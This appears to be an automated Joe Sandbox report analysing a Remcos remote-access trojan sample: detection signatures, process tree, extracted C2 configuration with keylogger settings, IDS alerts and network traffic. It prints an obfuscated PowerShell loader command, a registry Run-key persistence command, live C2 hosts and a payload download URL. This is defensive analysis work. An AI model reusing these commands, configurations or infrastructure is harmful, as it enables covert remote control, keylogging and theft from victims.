Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x295IO8kqM.exe

Overview

General Information

Sample name:x295IO8kqM.exe
Analysis ID:1574342
MD5:3e4417c519a6dc532e433ad673bfa553
SHA1:a724189bc732612dd68bc0ce7f7ac9ffabbd89b9
SHA256:6e3fa4568a26535e48ab78ab8cc6e63fc96eb9262097f85d8c66d580dd7cd167
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • x295IO8kqM.exe (PID: 2468 cmdline: "C:\Users\user\Desktop\x295IO8kqM.exe" MD5: 3E4417C519A6DC532E433AD673BFA553)
    • powershell.exe (PID: 1300 cmdline: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt' ; $Diodens=$Coriin.SubString(73160,3);.$Diodens($Coriin) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • msiexec.exe (PID: 5324 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • cmd.exe (PID: 7944 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • reg.exe (PID: 6816 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["eweo9264gtuiort.duckdns.org:2879:0", "eweo9264gtuiort.duckdns.org:2889:1", "eweo9264gtuiorta1.duckdns.org:2879:0"], "Assigned name": "NewOne", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alsmdjtru-Z27L4O", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "aksloest.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\aksloest.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: msiexec.exe PID: 5324JoeSecurity_RemcosYara detected Remcos RATJoe Security
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6816, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Feries
      Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7944, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)", ProcessId: 6816, ProcessName: reg.exe
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.215.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5324, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49714
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5324, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)", ProcessId: 7944, ProcessName: cmd.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt' ; $Diodens=$Coriin.SubString(73160,3);.$Diodens($Coriin) , CommandLine: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt' ; $Diodens=$Coriin.SubString(73160,3);.$Diodens($Coriin) , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\x295IO8kqM.exe", ParentImage: C:\Users\user\Desktop\x295IO8kqM.exe, ParentProcessId: 2468, ParentProcessName: x295IO8kqM.exe, ProcessCommandLine: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt' ; $Diodens=$Coriin.SubString(73160,3);.$Diodens($Coriin) , ProcessId: 1300, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T08:50:06.791648+010020365941Malware Command and Control Activity Detected192.168.11.2049717192.169.69.262889TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T08:50:48.350112+010020327761Malware Command and Control Activity Detected192.168.11.2049716192.169.69.262879TCP
      2024-12-13T08:50:49.555506+010020327761Malware Command and Control Activity Detected192.168.11.2049718172.111.244.1132879TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T08:50:49.800765+010020327771Malware Command and Control Activity Detected172.111.244.1132879192.168.11.2049718TCP
      2024-12-13T08:53:00.444282+010020327771Malware Command and Control Activity Detected172.111.244.1132879192.168.11.2049718TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T08:50:50.582431+010028033043Unknown Traffic192.168.11.2049719178.237.33.5080TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-13T08:50:35.665130+010028032702Potentially Bad Traffic192.168.11.2049714172.217.215.102443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: x295IO8kqM.exeAvira: detected
      Source: 00000003.00000003.4145873580.0000000000836000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["eweo9264gtuiort.duckdns.org:2879:0", "eweo9264gtuiort.duckdns.org:2889:1", "eweo9264gtuiorta1.duckdns.org:2879:0"], "Assigned name": "NewOne", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alsmdjtru-Z27L4O", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "aksloest.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}
      Source: x295IO8kqM.exeReversingLabs: Detection: 39%
      Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5324, type: MEMORYSTR
      Source: Yara matchFile source: C:\ProgramData\aksloest.dat, type: DROPPED
      Source: x295IO8kqM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.215.102:443 -> 192.168.11.20:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.177.122.132:443 -> 192.168.11.20:49715 version: TLS 1.2
      Source: x295IO8kqM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.11.20:49716 -> 192.169.69.26:2879
      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.11.20:49718 -> 172.111.244.113:2879
      Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 172.111.244.113:2879 -> 192.168.11.20:49718
      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49717 -> 192.169.69.26:2889
      Source: Malware configuration extractorURLs: eweo9264gtuiort.duckdns.org
      Source: Malware configuration extractorURLs: eweo9264gtuiort.duckdns.org
      Source: Malware configuration extractorURLs: eweo9264gtuiorta1.duckdns.org
      Source: unknownDNS query: name: eweo9264gtuiorta1.duckdns.org
      Source: unknownDNS query: name: eweo9264gtuiort.duckdns.org
      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
      Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
      Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
      Source: Joe Sandbox ViewASN Name: M247GB M247GB
      Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49719 -> 178.237.33.50:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49714 -> 172.217.215.102:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficDNS traffic detected: DNS query: eweo9264gtuiort.duckdns.org
      Source: global trafficDNS traffic detected: DNS query: eweo9264gtuiorta1.duckdns.org
      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3201211577.0000000024AA5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3201184446.0000000024AA4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5270270708.0000000024AA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145548154.0000000024AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gplBs
      Source: msiexec.exe, 00000003.00000003.3201211577.0000000024AA5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3201184446.0000000024AA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpoAJ
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpqs
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpxeFp
      Source: x295IO8kqM.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: msiexec.exe, 00000003.00000002.5248319710.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 00000003.00000003.4145873580.0000000000828000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-449a-bb32-9d4a700c395b
      Source: msiexec.exe, 00000003.00000003.4145873580.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000836000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?
      Source: msiexec.exe, 00000003.00000003.4145873580.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000836000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/g
      Source: msiexec.exe, 00000003.00000002.5248319710.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5270075772.00000000247D0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248319710.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf
      Source: msiexec.exe, 00000003.00000002.5248447149.000000000080D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000003.00000002.5248447149.000000000080D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/(R
      Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Hx
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download
      Source: msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download&
      Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownHTTPS traffic detected: 172.217.215.102:443 -> 192.168.11.20:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.177.122.132:443 -> 192.168.11.20:49715 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052B8

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5324, type: MEMORYSTR
      Source: Yara matchFile source: C:\ProgramData\aksloest.dat, type: DROPPED
      Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 6%
